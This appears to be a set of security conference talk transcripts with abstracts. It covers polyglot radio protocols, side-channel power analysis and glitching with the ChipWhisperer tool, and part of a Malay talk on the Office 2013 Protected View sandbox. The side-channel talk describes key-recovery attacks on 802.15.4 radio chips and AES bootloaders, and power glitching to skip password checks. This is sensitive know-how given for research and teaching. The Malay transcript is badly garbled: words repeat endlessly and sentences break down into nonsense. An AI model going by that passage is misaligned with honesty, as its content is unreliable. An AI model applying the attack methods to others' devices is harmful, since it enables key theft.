frequency that I want to use. And then I move over to another virtual desktop on my Mac. And VNC on a Mac actually stops sending packets when you're not viewing the screen or it sends like a quiet little idle tone or something. And then I move back and from the waterfall I could see that the noise actually went away almost to a very thin carrier wave at exactly the time that I was looking away from the screen. As soon as I came back it became noisy again. I then go to the apartment. I'm sitting in front of the computer. I see that it's very narrow. I see that my interference has mostly gone away. I start to pirate a movie. Instantly there's a bunch of noise everywhere. So what we realized was that the interference was actually coming from the bad wiring and that you could transmit Morse code this way. We call this the Madeline protocol. I successfully sent Morse code from my apartment down the street remotely just by the way. By triggering large file transfers and then short ones. Well, crimp your cables. Just by sending a long pulse for a DA and a short pulse for a DE. You'll see like a couple of points in between where other users of the same network created similar artifacts. But it being less bandwidth, mine stands out. Their cables were probably better. Yeah. Oh, they were on Wi-Fi actually. So it was a shorter route to the switch. So you too can do this. Yeah. So the other cool thing about these protocols is that they're a shortwave, which means that you can go to a local store and buy a shortwave receiver. And I having a license can transmit a signal with a ton of power from the Northeast United States. This map shows roughly where the signal gets to on a bad day. On a good day it gets to Europe and South America and all sorts of other fun places. So at some point in the next month I'm going to start transmitting sort of Fox Hunt signals, properly identifying and without cryptography and with all being all of the other rules. But you can receive these pretty much anywhere in North America or in Europe if you're patient or in South America. And you can record them and then you can try and find the hidden message in each signal. So in the current issue of the PocoGTFO you will find an article about the DEF CON wireless village CTF. But of course to come to that CTF you had to come to DEF CON and then go to the wireless village and sit there. Yes, but the CTF comes to you. And so what are the conclusions? These are very simple protocols. But they use exactly the same machinery as the more complex protocols. They use the same kinds of modulation, phase shift keying, frequency shift keying as the grown up protocols. You can think of them as the levers and the blocks, as the simple mechanisms, as the gears that you start practicing with. And perhaps also sometimes build a huge pyramid with if you've got enough patience and labor time. So the same quasi-differentials abound in those protocols. They should be understood. And then with more expensive equipment you might actually be able to bring them to up the complexity slope to the more complicated protocols. And no longer are you limited to polyglots in just PDF or zip or JIF or JPEG or the other kinds of valid formats that the Journal of PRCOGTFO comes in. Now you can have digital parsers, digital radio polyglots which take advantage of both phi and encoding and sometimes even error correction. So there is ponogen phi. Go find it. Our talk is meant to just show you some very simple examples of where it can be found. But of course the further you go into that forest the more interesting it will become. Thank you kindly. As Dan Geer says, there's not enough time in the world, so thank you for yours. Goodbye. Thank you.
|
Ah Matryoshkas, who doesn't like these Russian nesting dolls? But why should the fun of chimeric nesting be limited to just application formats? It is possible to design PHY-layer digital modulation protocols that (1) are backward compatible with existing standards and (2) discretely contain additional information for reception by those who know the right tricks. When properly designed, these polyglot protocols look and sound much like the older protocols, causing an eavesdropping Eve to believe she has sniffed the contents of a transmission when in fact a second, hidden message is hitching a ride on the transmission. Mallory, on the other hand, may use these protocols-in-protocols to smuggle long Russian stories to all who will listen! This fine technical lecture by two neighborly gentlemen describes techniques for designing polyglot modulation protocols, as well as concrete examples of such protocols that are fit for use in international shortwave radio communication.
|
10.5446/32813 (DOI)
|
All right, we're good. So it'll take a second when I switch for doing the demo to mirror it. But thanks for sticking around before the coffee break for a second here. So I hope you find this interesting and learn a little bit about sort of more hardware hacking level of stuff. And in particular, I'll be talking about side channel power analysis and glitching. So very quickly, I'm going to review what side channel power analysis is. Previous presentations have gone over this in a lot more detail. So this is going to be the super abridged version of that sort of talk. I'm not going to go over every little detail of how the theory of it works. You can see some of my previous talks if you're interested in that. I'll give you two examples of where you can use side channel power analysis on real targets. And after that, I'll pretty briefly cover what glitching is. And sort of an example of doing glitching against a Raspberry Pi running embedded Linux. All right, so about me, right now I'm doing a PhD at Dalhousie, which is in Halifax, Canada. As part of that, I designed this open source project called ChipWhisperer. And it's gone through a few different iterations. And the most recent iteration is the one I'm talking about, ChipWhisperer Lite. And I've spun out a company to help commercialize that, but it's a completely open source project. So everything's open. It's a little like the talk before the previous one, saying, you know, it's one man writing crappy code. Very much the same to the point that I learned Python doing this project. So the early code is a lot sketchier than the later code. You can sort of see the progression. So, and I've talked about this a little bit about various black hats. Recon last year, there was sort of an earlier version. And I'll be at Defcon and black hat again this year. So if you're there, you can hunt me down. All right, so what is side channel power analysis? Very briefly, what you need to do this is you need some sort of device. So we have a crypto device. And that device in the center is doing, you know, whatever algorithm we're interested in, so be it AES, some sort of symmetric algorithm, or something else. We also have to have either input or output. It doesn't matter which. We don't need both. And we don't have to control it. But we have to be able to see what one of those pieces of data is or be able to determine it. So this is AES, for example, AES 128. We would have to know either, you know, the cypher, the plain text. And the AES is what I'll be using. It also has to be operating with the secret key loaded. So that's sort of one of the other critical things we'll see. So you can't use side channel power analysis if you have a hard drive sitting on a table that's not encrypting or decrypting anything. This won't work against that sort of target. So you know, if it's a self encrypting drive, if you can do these measurements well, the drive is encrypting and decrypting, it is a viable attack vector. So that's sort of the only caveat you have to understand with it. It's not just a magical attack against encryption. It's very specifically attack against implementations when they're doing specific work. So the super fast description of how it works is that if you look inside digital devices, inside a digital device you have something like a bus line. So these are, you know, the data bus lines. And the data bus lines are just long wires. These long wires you can sort of simulate or, you know, view them as just capacitors. There's a, the long wire has a capacitance to it to change the voltage on that capacitor, takes physical power. So to change it from zero to a one, it takes a tiny amount of charge. And if we look in the chip, if we have, so here I have two data lines. And those data lines always switch on the clock. And if two of the data lines switch from zero to one, it takes, you know, this, I have two data lines here switching up. And you can see there's sort of a spike of power if you can see it on the screen. And then later on, for example, the data lines switch low. So I'm only looking at power consumed from one of the power rails. They switch low so it doesn't take any power from the positive rail, so you don't see that spike. So the idea is that there's some linear relationship between power consumption and the number of bits set to one on the data bus. And this is real. It's not sort of like, oh, it kind of works, hopefully. This is a measurement I did on a small 8-bit microcontroller. And it's showing you for, on the bottom is what they call Haming Weight. So this is number of bits set to one. And so either no bits are set to one or all bits are set to one. And on this axis is the current sort of consumed by the device. It's a measurement related to the current, so it's not directly, you know, milliamps or something. But you can see there's a very beautiful linear relationship. Why this is useful to us is if we look at a lot of algorithms, so again going back to AES, it's 128-bit key. So we can't, you know, guess the key any way we want. But what we could look at is we say, well, it operates on one byte at a time. And if we just concentrate on one little section of the algorithm, so if I just sort of draw a crude square rectangle around that section up there, what the power analysis will tell us is that we're going to look just at, say, this point in the algorithm. We're going to look at the data right at this output here. So if you can, oh, I don't think it's trying, sorry. There we go. This output there. So we're only looking at one byte of the key, one byte of the key, and the output of that one spot. And we could figure out, you know, based on the power analysis that there was four-bit set when I put in a plain text of AB, hex AB. And the only way we get four-bit set is if the key is some other byte. In reality, we'll, of course, get a candidate number of possible bytes for that key. So we could send in another piece of plain text and say, well, we send this other byte of plain text. There is two-bit set at that intermediate value. We know all of them, how the algorithm works, so we can narrow down what that byte of the key is. So the point is that we're doing this guess and check on a single byte of the key, and we just do it 16 times in a row. So it's just two to the eight guesses, 16 times. So it's very tractable and an easy amount. To do the measurement of the power, all you really need is something that, like an oscilloscope, or something that is capable of, you know, measuring the power. I have my own custom hardware to do this, but this is just, you know, an off-the-shelf USB scope. And I have a device that is running whatever the encryption example I'm interested in. So I just have a board that's a chip running, you know, some program using encryption. And that's really all that's involved in the attacks, what you require. So to help simplify this, this is what I had showed last year. I did this chip whisperer project, so it's designed to be a combination of the hardware, which is replacing the oscilloscope. So doing the power measurement side, as well as a board for programming with, you know, if you want to analyze, say, AES library, you can program it into the board and do the measurements there. You can, of course, target physical devices, or I'll show some examples of that. Last year it was in second place in the Hackaday Prize in 2014, and that version of the hardware was then sold as a security analysis tool. So again, all open source, the hardware and software. To make it even more accessible, so the problem with this is it was still a bit fiddly, a little bit more expensive, like $1,500. And we really need to push it to the point that all people know about this, that might have to design these products or look at the security of products. So I've done a Kickstarter for, in the Kickstarter about $200 US, the chip whisperer light board, and it's doing almost the same thing. So it has a section of the board that is doing the sort of, the target device. So this is the, it's an atmel x megabit. You program it with whatever library you want, and then there's a portion of the board that does stuff like the analog to digital converter. It has a high speed USB, it has an FPGA and all that stuff. So it's effectively designed to give you a tool to learn about the theory behind these attacks. The critical thing with side channel analysis is it's not never going to be a script kitty point and click attack. You have to understand how everything works about them to, you know, even hope to apply them. So this tool is designed to give you that sort of training. And of course you don't, there's nothing special about it. You can just go back and build your own if you have an oscilloscope that works. The software works with anything. It will work with regular oscilloscopes, as that's what I used to use. All right, so let me give you an example of what this looks like in real life. This was the super fast talk, the super fast demo that I had done last night. And I'll sort of do the same thing just so you see what the waveforms look like. So if I run the capture tool, it's going to do that sending data to the device, record power, and see what the encryption is. Let me pull it over. Which way is it? So this is the tool. It's all written in Python. And it's very fiddly on this monitor here. And it's just, it can attach to various targets. So I'm going to be attacking AES on this little X mega board. So what it's doing is it's going to send encryption messages to the device and then record the power. So you can see the sort of traces bouncing around. That's as it's recording different messages. And you can view the AES 128 input and outputs just raw. So in this example, I just am testing the library. So it just sends a message, encrypts it, and that's it. What I can do, for example, to give you a more intuitive feel is that if I set this to fix, so if it's encrypting the same data repeatedly, you'll sort of see the waveform doesn't jump around quite as much. There's a bit of noise. But the peaks, if you look at the bottom down here, don't change nearly as much. And if I switch this back to encrypting random data, you can see those peaks jumping around a lot more. So it gives you a feeling there is a data dependency based just on the what's being encrypted. All right. So what we're going to do is we're just going to capture like 50 traces. So it just sends 50 messages to the device and encrypts them and monitors the power while it's doing that encryption. And I'll save test recon 2015. And there's no undo in this GUI. So I don't need undo. And in fact, if you can't close a project and reopen a project without closing the whole thing, so it has lots of features like that. All right. And then the analysis side is a separate program. So the analyzer, previously, I mean, people have been doing this research for 15 to 20 years in the power analysis side alone. And you can use, you know, straight Python, you can use MATLAB scripts. You don't have to use this. It's a very simple file format. The idea of the GUI is just to sort of get you started and give you a feel for what the traces look like. So if I open that project, what we see is the waveform here. So that was the waveform I just captured. And the attack. So we have to know a little bit about the device to attack it. In this case, I know it's AES 128. And because it's on a microcontroller, there's certain power models we use. And I talked about that in previous presentations. So I'll skip that. And all it's going to do, it's doing the analysis. And the key in red is the correct encryption key. And it knows what the correct key is because I've told it what the correct key is. So you can see in this example in 50 traces, it almost entirely recovered the key. There's one byte that maybe it needed a few more traces for. But it's very, very fast. Like that, you know, was a few minutes start to finish for the whole demo. One of the other questions people always ask is, well, how do you know where the encryption is happening? And the analysis itself gives you some of those answers. And so what this is, this is graphing the correlation between, it looks for that linear relationship. And this peak is at various points in time as it's executing instructions. So all I do is I say, I send you data at some point between sending you data and getting data back. You're running the encryption algorithm and doing that operation I'm targeting. So I can compare, for example, this is recovering byte 4. If I look at recovering byte 5, what you'll sort of see is you notice that peak is marching on in time. And this is because this is an AES software implementation. So it's doing byte 5, byte 6, byte 7. And you can see the specific instance in time where that operation of interest is occurring. So it also gives you some information about the underlying process. All right. So there's that. That's what a side channel analysis briefly looks like. So what could we do it again? So here's two sort of demos I've done or work I've done more recently. So this 802.15.4 standard is, was hoped to be a big protocol for the Internet of Things. It never really turned out as much. But there's a few things using it. The Nest thermometers use it as one of the interfaces, I believe. There's some wireless light bulbs that used it. It's used a bit for smart energy sometimes for connecting networks in the home. And you might know it better by other names. So 802.15.4 is the lower layer protocol used by all of these. So all of the Zigbee ones people have probably heard about. But all of these protocols are built on top of 802.15.4. And if you want more details, by the way, about the attack, it's in this paper here that I sort of just put online. So this is the first time I've really talked about it. And what I'm doing is I have a 802.15.4 node. And this 802.15.4 node, I'm using a development board here that's sold by, you know, Third Party. And I'm targeting a 802.15.4 system on a ship. So it has a microcontroller and the radio all on board. And at the same time, I'm measuring the power using the shunt here of the board. So for this attack, I do physically need to have the device. You don't necessarily need to use the shunt. You can do stuff like a magnetic field probe, which doesn't require the soldering, but you still need to be close to the device. What's sort of interesting about this is, for example, a lot of targets, you know, a lot of central routers at some point will have a web-based interface as well as the 802.15.4. So the Nest thermometer, or I don't know if the thermometer does, but Nest Protect, I think one of the gateways has 15.4 on one side, your internal network on the other. So while you couldn't get access to the gateway, you may be able to get access to a device that the gateway is talking to. And so maybe you can use the device the gateway is talking to to then fuzz into the gateway to find vulnerabilities. So there is a lot of reason why you should be concerned if we can break these devices fairly easily and then spoof messages on the 802.15.4 network. So the 802.15.4 frame format looks something like this. And very briefly, when we're doing a secure message, the only stuff you really care about is so the destination address we can set to a broadcast, so we can just sort of force a node to receive it. And any node that receives, you know, a valid looking message is going to try decoding it. And if we set this security stuff up, what that's going to include is it's going to include the device will try to decrypt the message. It will obviously throw it away as soon as it realizes it's invalid. But we can cause that, those operations we require to happen. So way back here, I said for side channel analysis, we just, what we need is the ability to cause the device to do the encryption or decryption with data we know or control or something like that. So in this case, I'm sending the device a cipher text and it's going to decrypt it just because that's what it will do. It's going to verify the MAC which will fail and it will throw it away. But we don't care. We don't care about the verification. It's using AES in counter mode which gives us one sort of problem in that only a few of these bytes we actually control or even vary is the real problem. So there's just this frame counter that comes from the over the air message. The frame counter is four of the bytes to the input. So if we looked at the input, what this means is that these, or no, not these, these four bytes are variable and the rest are all fixed. So when you do that power analysis attack, I mentioned how it's doing this guess and check, there's no way to guess when you don't have any variation in the input message. You'll only be able to recover the keys where there is some change in what the input data is. The bytes where the input is fixed won't give you any information for this type of standard attack. There was previous work on AES counter mode showing how to push this into later rounds. So I sort of extended that a little to the specific mode used in 15.4. And what you end up with is that you basically are trying to push the attack into later rounds of AES. So AES itself, when we perform the attack, will recover four bytes of the key. As part of the AES algorithm, it's going to do the shift rows operation here. So it effectively shifts around the keys, or shifts around the bytes and then mixes them together. What this will mean is that if we looked at the second round of AES, we no longer have the case where only four of those bytes are constant. A whole bunch of those bytes are going to vary because that's sort of the design of AES. And we can now recover a lot more of the key material. And we have to push this to about the fourth round. And eventually we can recover the entire key from the AES algorithm, even though only four of those bytes vary at the input. So it's also not always the case that you can just look at it and say, oh, it's safe because, you know, a few bytes change only. There's a lot of tricks like this you can do. The second part of the attack is looking at the 15.4 system on a chip. It has a hardware AES peripheral. So the question is, can we attack that with side channel analysis? Does it leak? In this case, the answer is yes, it does, basically. So this is showing what's known as the guessing entropy. If the entropy goes to zero, we know the key with absolute certainty. So you can see the entropy is going down towards zero. Basically, if you can send the device, you know, 20,000, 10 to 20,000 messages, you can recover the key. And for the 15.4 node, that doesn't take very long. You just are firing at messages. The device is decrypting them. The verification fails and that throws it away. It never tells the higher layer. And eventually we can get the key and then send it a message, you know, as if it was properly encrypted or send a message from the device encrypted with the key for whatever that link is. That's example one. Example two is an AES 256 boot loader. And I sort of pulled this because if you look at app notes from a lot of silicon vendors, what they have is they'll say, well, here's an AES boot loader. So app mail has one. I can't even read free scale. And whatever this one is, has one as well. And there's a few other ones. And they're all more or less the same. As a note, if you want more details, there's sort of a tutorial I wrote on this and a recent paper that was just published on this attack. And very briefly, all of these protocols vaguely use this idea where you get the updated microcontroller firmware. They split it into, you know, whatever size blocks they're using. They prepend some fixed number of bytes in the front. So these fixed bytes effectively form the signature. And the idea being it's just going to decrypt every block and check those fixed, those four bytes are correct. This to ensure that it's, you know, supposed to be an update file. So this is kind of what they use. You know, there's some variations, but it makes a good generic statement. So what's interesting to us, and it's used in a CBC mode, is that the data, if we just send the device a block like this, you know, of encrypted data, we put the CRC on it, we put the header on it, it's going to decrypt it and check the signature. The signature will fail and throw, it'll throw it away. But again, we don't care about that. We care that we were able to get the device to decrypt it properly. And so this is great because we can do a side channel attack now because what we have is we have this situation. We have the input safer talks here, the AES-256 decryption in the center, and after the decryption, it's applying the IV. So we don't even care what the IV is, in fact, at least initially. We have everything we need to do the entire side channel analysis. The only caveat, because it's AES-256, it's a tiny bit more difficult in that you have to do the attack twice. So you'll do it first on the first round of the decryption or, you know, last round of the encryption, whichever way you want to look at it, and you'll recover all of these. So you'll recover the information here to figure out what the final round key or the first round via decryption key is. Once you have that key, you can then attack the next round and recover the full 32-byte key for AES-256. And you know, there's always tricks. As I say, it's never just a push-button attack with a side channel analysis. So in this case, one of the problems might be that the AES implementation actually has a timing attack in it as well. And so things become unsynchronized. So we have the first round going here. At some point, there's a time-dependent operation. So what you can see is that if I overlay, I think, about 100 power traces, up until that point, they all look, you know, this amplitude differs, but there's a very nice sort of outline. Beyond that point, things look crazy. It's not synchronized at all. And that's because there is some time-dependent operation where the time depends on the data, giving us the timing attack, which we ignore. So all we do is, you know, we can resynchronize. Basically, you try shifting each trace a little bit, a few points to figure out the synchronization again. And then you're good. And you can do the side channel power analysis attack on the next round. And what this looks like, so there's two success rates here. A success rate of one means I 100% of the time recover the key with a certain number of encryption attempts. So for the first 16 bytes of the key, you can see that in about 60 traces, it almost, with 100% certainty, is able to recover the encryption key. It's a very wavy line, I know, but it should be about straight. And it takes a few more to recover the last 16 bytes of the key. But we're still talking about, you know, 100 to maybe 200 encryption attempts. And each attempt is me just sending that garbage packet to the device. So this does not take very long at all to do that type of attack. All right. So with that interest, how can you get started? Really, all you need to get started is a few things. You need a simple target device. So do not try side channel analysis for the first time on a Raspberry Pi or anything like that. You want a, you know, 8-bit microcontroller ideally. So an AVR dev board, like I showed the one earlier, the Arduino Uno, again, not the ARM stuff, or a PIC controller. And you just need some way to measure the power on it. So a scope with a USB API. So I like the PicoScope models. A lot of bench scopes have it. The only thing to be wary of is the, you can get really cheap off-brand scopes off eBay. A lot of the time the USB interface is poor. So it comes with software and that's all it works with. You'll spend a lot of time reverse engineering it. Or of course there's one of the projects I have. So the chip whisper or chip whisper light, which are somewhat commercial wherever it was back here. Or you can build one yourself. All the designs are open. All the PCBs are available. All right. So that's the side channel stuff. What about glitching? So what is glitching? It's the first question. Glitching is really when we make the device do something that it is not supposed to be doing. So in this case what we might have is I'm doing an example of glitching where I just have a simple loop and I just go through the loop and it is doing some different things. So it's just doing these additions. And I can insert glitches using just a short on the power rail. And the short is just an electronic switch shorting the power rail. And you can do this against an AVR microcontroller. You can do it against Android device. So this is a smartphone. Or even something like a Raspberry Pi running Linux. And what you end up with, so again all I'm doing is I'm shorting the VCC power rail here. And what I end up with is a nice wave form like this. So when I engage the short it drops the power for a very controlled amount of time and then generates a large ringing spike. And this will cause incorrect instructions to be executed. So in my test all I'm looking for is the wrong numbers calculated. You can use this to calculate incorrect encryption information. You can use it to bypass stuff like a password check or anything else. And all again you can get started really easily. Just use a small target. You load some simple code like I showed you, like that for loop. And you just start trying different parameter sizes. So in the game the chip whisperer light supports the same idea with having that electronic switch all integrated on. So hopefully this really quick presentation has given you some pretty interesting sort of thoughts about why side channel power analysis is fun and it's not that difficult even though it might seem like a really complicated thing. Just with a little bit of experimentation on your own you can probably get started in it. So at that point if you want to contact me there's various ways. And everything's posted on chip whisperer.com. Get and stuff like that. So questions if there's time? One question? No questions? You
|
The super-cool area of side-channel power analysis and glitching attacks are devious methods of breaking embedded devices. Recent presentations (such as at RECON 2014) have shown that these attacks are possible even with lower-cost hardware, but it still requires a fair amount of hardware setup and experimentation. But we can do better. This presentation sums up the most recent advances in the open-source ChipWhisperer project, which aims to bring side channel power analysis and fault injections into a wider realm than ever before. It provides an open-source base for experimentation in this field. The ChipWhisperer project won 2nd place in the Hackaday Prize in 2014, and in 2015 an even lower-cost version of the hardware was released, costing approximately $200. Attacks on real physical devices is demonstrated including AES peripherals in microcontrollers, Raspberry Pi devices, and more. All of the attacks can be replicated with standard lab equipment – the demos here will use the open-source ChipWhisperer hardware, but it’s not required for your experimentation.
|
10.5446/32815 (DOI)
|
Selamat pagi semua dan terima kasih kerana menjaga saya hari ini untuk mengenai kawasan Microsoft Office 2013 Protekt Abuse & Box Saya akan beri alasan untuk mengenai kawasan Microsoft Office 2013 Protekt Abuse & Box Saya adalah Yung Chuan dan kawan saya yang mempunyai Yung untuk kawasan Microsoft Office 2013 Protekt Abuse & Box Saya adalah konsultant sekolah dengan NWR Info Security di Singapura Saya ingin mengenai kawasan Microsoft Office 2013 Protekt Abuse & Box Saya adalah Yung Chuan dan kawan saya yang mempunyai Yung untuk mengenai kawasan Microsoft Office 2013 Protekt Abuse & Box Saya akan memulakan kawasan Microsoft Office 2013 Protekt Abuse & Box Saya akan mengenai kawasan Microsoft Office 2013 Protekt Abuse & Box Saya akan mengenai kawasan Microsoft Office 2013 Protekt Abuse & Box Saya akan memulakan kawasan Microsoft Office 2013 Protekt Abuse & Box Saya mengenai kawasan Microsoft Office 2013 Protekt Abuse & Box Saya mengenai kawasan Microsoft Office 2013 Protekt Abuse & Box di aplikasi, resursus adalah di kawasan yang penting untuk benda yang sama. Tetapi apa yang kita bincangkan di sini? Ia mungkin menjadi sebaiknya sebagai sistem ke-5 atau registrasi untuk berhasil berhasil berkaitan berlainan seperti berkaitan berkaitan atau membuat proses baru. Tetapi sebagai perusahaan keadaan dari perusahaan, kadang-kadang ada beberapa keadaan atau keadaan yang berkaitan sebaiknya yang harus dilakukan tetapi yang diperlukan untuk dibuat. Jadi di perjalanan, biasanya ada sebuah perusahaan yang boleh dibuat di perjalanan ini jika perusahaan berkaitan untuk mereka. Perusahaan keadaan yang berlainan yang diperkenalkan dari MF Office 2010. Selain keadaan yang biasa, perusahaan keadaan tidak digunakan untuk menerima semua perusahaan. Ia dibuat untuk perusahaan yang diperkenalkan untuk Microsoft yang menurut saya tidak dipercaya. Ini menggunakan perusahaan yang diperkenalkan dari internet seperti yang diperkenalkan, semua yang diperkenalkan sebagai perusahaan keadaan. Jadi di general, perusahaan protektif akan menunjukkan dalam mode tekstif yang hanya diperkenalkan, semasa pada masa yang sama, ia mengambil keadaan yang tidak terdapat untuk perusahaan ini. Sekarang, perusahaan untuk ini mengharapkan kerana pada masa ini, mereka mengharapkan pelajaran yang terbaik untuk menggunakan perusahaan lain. Untuk contoh, Mark Vincent Jensen dan James Foshoff berusaha menerima perusahaan untuk IEPM. Tapi seperti sekarang, apabila perusahaan protektif telah diperkenalkan selama 5 tahun, tidak ada perusahaan public yang masih diperkenalkan. Dan dikongsi Microsoft tidak mengubah informasi teknikal tentang perusahaan ini. Untuk menuju kembali pada perusahaan perusahaan, perusahaan perusahaan ini adalah untuk menemukan perusahaan perusahaan perusahaan protektif dan juga perusahaan perusahaan yang perusahaan perusahaan ini dapat dilakukan untuk perusahaan perusahaan ini, i.e. perusahaan IPC. Dan pembentangan yang telah diperkenalkan bersama dengan perusahaan ini. Jadi, kita beritahu untuk lebih banyak detik jika anda mahu beritahu. Dan untuk pemenang yang menunggu sejak 0 hari dari hari ini, saya akan mahu meminta maaf di awal. Jadi, jika kita bergerak di dalam sekeliling ini, saya akan bercakap tentang perusahaan perusahaan perusahaan yang akan memperkenalkan bagaimana kita akan menerima sebuah teksur dan kita juga bercakap tentang proses perusahaan dan juga perusahaan perusahaan sistem. Dan sejak tidak ada informasi public, model model perusahaan protektif akan dipercayakan dengan perusahaan perusahaan IPI. Model IPI diperkenalkan sebab mempunyai penggunaan kode di Microsoft atau membuatnya berkumpulan yang sama. Dan juga sebab ada sebuah referensi yang baik untuknya dibuat oleh banyak pelajari lain. Sekarang, ini adalah pilihan pilihan IPI yang biasa untuk membuatkan proses perusahaan berkeliling Pilihan Pilihan Pilihan yang membuatkan perusahaan web untuk diperkenalkan dan juga OS. Dalam model ini, 3 kumpulan main-main adalah penting untuk fungsi pilihan pilihan. Pertama, adalah kumpulan intersepsi. Pertama, adalah kumpulan policy perusahaan pilihan dan terakhir, adalah IPC. Kumpulan intersepsi digunakan untuk pilihan IPI. Namun, pilihan pilihan perusahaan 3 yang membuatkan pilihan IPI untuk konteks perusahaan. Jadi, bagi contoh, pilihan pilihan original yang mempunyai perusahaan perusahaan di luar dengan pilihan pilihan ini supaya ia akan menjelaskan pilihan di dalam pilihan pilihan. Pertama, ada beberapa situasi kemahiran yang hanya perlu dilakukan dalam konteks pilihan pilihan. Terakhir, pilihan pilihan mungkin akan diperkenalkan pilihan pilihan pilihan untuk yang pilihan pilihan yang dapat digunakan dalam kemahiran pilihan. Pilihan intersepsi digunakan oleh IPI untuk mencari apakah pilihan yang sama prosesan sandbox digunakan untuk menggunakan. Dan, pada kemudian, EAT dan prologan fungsi yang dibunakan juga menggunakan. Dan, sehingga ia berlaku, tiada menggunakan dalam pilihan ini. Jadi, tidak ada pilihan intersepsi disini. Dan sejak pilihan intersepsi tidak ada, pilihan pilihan tidak akan terdapat juga sejak berkongsi. Tetapi, tetapi, ia masih akan membuat pilihan lain, sehingga ini daripada perspektif lain. Sekarang, kami tahu pilihan pilihan pilihan adalah menggunakan pilihan pilihan dengan pilihan pilihan dan pilihan pilihan pilihan. Dan pilihan pilihan akan menggunakan untuk mempunyai prosesan yang diperkenalkan sehingga kita akan memperkenalkan pilihan yang pertama untuk menggunakan pilihan pilihan pilihan antara pilihan 2007 dan pilihan 2013. Dan dari ini, kami periksa apakah mereka ada pilihan pilihan pilihan yang sama. Pilihan 2007 digunakan kerana pilihan yang terakhir, ia tidak memperkenalkan pilihan pilihan. Jadi, ini bermaksud pilihan pilihan pilihan yang baru mungkin dapat dilatihkan pada pilihan pilihan. Dan sehingga ia tidak ada pilihan pilihan baru yang ada di sini dan jadi kami memperkenalkan pilihan pilihan pilihan pilihan. Terusnya, IPC adalah komponen yang penting dalam pilihan pilihan pilihan. Kerana, untuk beberapa alasan, pilihan pilihan yang perlu kita bercakap pada masa yang berlaku. Tak terkejut, pilihan ini adalah terhadap pilihan pilihan protektif tetapi, menurut IE yang berkong IPC dan membuat pilihan pilihan pilihan pilihan pilihan pilihan, IPC. Ini akan digeritakan dalam keadaan yang akan dikatakan di sekeliling. Jadi, pilihan pilihan pilihan protektif adalah sebenarnya sangat mudah dan ia mempunyai sesuatu seperti ini tanpa komponen. Ini sangat menarik sebab filihan ini memperkenalkan hanya pilihan pilihan pilihan pilihan. Dan sehingga, semua alasan pilihan pilihan tidak perlu. Ini juga bermaksud pilihan pilihan pilihan pilihan pilihan yang tersebut, dan terutama untuk keadaan yang tersebut yang selalu terang diberikan di IEPM pilihan pilihan pilihan. Sebagai keadaan yang terakhir, kita lihat bahawa semua alasan yang tidak dikatakan dalam proses pilihan pilihan pilihan pilihan. Jadi, pilihan pilihan pilihan yang perlu dikatakan untuk mengidentifikasi pilihan pilihan. Kita dapat lihat bagaimana ia membuat dari objek yang kita bincangkan nanti. Sekarang dalam pilihan pilihan pilihan, ada tiga sepatutnya yang harus digunakan dalam pilihan pilihan pilihan pilihan. Pertama, ia harus mempunyai keadaan yang tersebut dengan memasangkan atau membuat alasan yang berlaku. Dan kemudian, pilihan pilihan pilihan yang harus dibuat dalam pilihan pilihan pilihan pilihan pilihan untuk menggunakan pilihan pilihan yang mungkin mempunyai dengan sebuah proses pilihan. Dan akhirnya, perusahaan prosesnya harus juga dipercayai dengan pilihan kerja. Sekarang kita akan melihat prosesnya dan pada masa yang sama, periksa tiga sepatutnya yang dipercayai. Jadi, ini adalah pilihan pilihan pilihan. Ada dua pilihan yang saya mulakan pada kali yang tersebut. Pilihan pilihan pilihan pilihan atau pilihan pilihan pilihan, jika ini memilih dan dikeluarkan. Berusahaan ini akan mengenai pilihan pilihan HKLM, software, Microsoft Office, Komun, Secularity, Pilihan pilihan pilihan pilihan atau apakah mengenai pilihan ini dengan Sassi. Pilihan pilihan pilihan yang akan memanggil perangkatan keadaan dalam pilihan pilihan pilihan ini. Pilihan pilihan pilihan pilihan mengenai perangkatan dengan xapp. Untuk awal, kita akan melihat dan sebuah alih terdapat 10 bit. Kemudian ia membuat keputusan untuk objek kerja. Tetapi ia tidak membuatnya sepanjang masa dan dengan keputusan, tidak ada keputusan UI. Selepas itu, ia menghasilkan sebuah alih terdapat. Dalam mode App Container, ini dibuat dengan alih terdapat dari API yang dibuat dari App Container. Dan dalam mode Integrity, alih terdapat kota yang terdapat tapi untuk kejadian yang terdapat yang dipergatakan dari alih terdapat.�ungguh Sla schnell menemukan kebar sayuran dan mem�minkannya akan tatik dari Seoj Bahari jika ia di- casi perfunkan. Dan ke последранya, ia terlalu ditavalkan disini. Ter hydro ke squee ilmean datang yang masih numb kemudian membuat ketuaan kemudian atau menganggap d selepas ini, hop drops kita akan ke pigsit Bukur set binary stopped P limited Kita hukumannya Proses Care unit seperti al eel developedGUI temp quiet Para pengguna penggerakan yang utama Dengan FengGeng. Orang gurני dan menuliskan Mac hot Saya yakin banyak orang tahu bahawa kawasan adik tersebut adalah tersebut tersebut tersebut tersebut yang akan mempunyai resursus sistem yang dapat dipercaya. Dalam keadaan IED ini, keadaan IED ini adalah mengenai dan mempunyai keadaan VIN-NT.h atau dari keadaan Mapping Registry T. Tetapi seperti yang anda lihat dari jalanan tarik, keadaan IED ini hanya mempunyai satu keadaan yang tidak di-dokumentasi atau mempunyai secara public. Untuk mempunyai keadaan SEMBOX, kita akan mencari untuk SEMBOX dan kemungkinan SID di kontrol SES dalam keadaan IED yang mengajar keadaan VIN-NT dan Registry T. Untuk keadaan VIN-NT dengan SEMBOX SID, SEMBOX hanya mempunyai keadaan Pembuatan Adil, Pembuatan Adil, Pembuatan Adil dan Pembuatan Adil dengan keadaan SES atau Standard Rights. Kepadaan SID tidak mempercaya keadaan SES untuk keadaan FOWL. Dan keadaan ini adalah apa yang kita akan menunggu dari proses startup. Untuk keadaan Registry T, SEMBOX SID dapat mengajar keadaan SEMBOX-nya dengan keadaan SES atau Standard Rights. Untuk keadaan SID, keadaan SES hanya memiliki keadaan SES dan dengan keadaan SES. Di antara ini adalah pembunuhan perang yang sekarang, software Microsoft Office, adalah keadaan Pembuatan Adil yang mempercaya keadaan SES yang mempercaya keadaan FOWL untuk yang lebih mempersendiri keadaan SES untuk diperkait. Maksudnya, jika sesuatu yang boleh digunakan keadaan FOWL untuk keadaan SES, ia tidak akan mempercaya keadaan SES. Ada sesuatu yang menarik yang anda boleh lalui dari Registry T adalah keadaan FOWL MRU SADKIS yang memiliki keadaan FOWL yang telah dibuka di pejabat. Akhirnya, keadaan SID tidak memiliki keadaan SES untuk diperkait dari SEMBOX, sehingga ia akan memiliki keadaan SES untuk diperkait. Untuk memasukkan segalanya dari sebuah sekses, anda akan memiliki keadaan SES. Pada awal keadaan SES, SEMBOX dapat 